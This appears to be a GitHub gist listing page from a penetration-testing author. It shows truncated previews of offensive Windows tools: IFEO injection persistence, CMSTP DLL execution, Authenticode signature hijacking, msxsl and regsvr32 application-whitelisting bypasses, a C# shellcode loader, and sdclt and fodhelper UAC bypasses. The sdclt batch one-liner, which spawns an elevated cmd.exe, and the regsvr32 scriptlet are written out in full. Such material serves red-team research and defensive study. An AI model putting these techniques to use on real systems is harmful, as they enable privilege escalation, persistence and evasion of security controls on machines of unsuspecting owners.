netbiosX
@netbiosX
netbiosX / ImageFileExecutionOptions.ps1
Last active Jan 15, 2021
Image File Execution Options Injection - Persistence Technique
<#
ImageFileExecutionOptions v1.0
License: GPLv3
Author: @netbiosX
#>
# Image File Execution Options Injection Persistence Technique
# https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/
function Persist-Debugger
netbiosX / pentestlab-dll.inf
Created May 7, 2018
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
netbiosX / DigitalSignature-Hijack.ps1
Last active Jul 14, 2020
Hijack Digital Signatures and Bypass Authenticode Hash Validation
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
netbiosX / customers.xml
Created Jul 5, 2017
Bypass Application Whitelisting via msxsl binary
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
netbiosX / Sdclt.ps1
Last active Dec 18, 2020
Bypass UAC via sdclt in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
 
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
netbiosX / sdclt.bat
Created Jun 9, 2017
UAC Bypass in Windows 10 via sdclt - batch version
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
netbiosX / FodhelperUACBypass.ps1
Last active Jan 13, 2021
Bypass UAC via Fodhelper binary in Windows 10 systems
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via fodhelper.exe
 
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
 
.NOTES
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
netbiosX / pentestlab.sct
Created May 10, 2017
AppLocker - Regsvr32
<?XML version="1.0"?>
<scriptlet>
<registration
progid="Pentest"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - @netbiosX -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");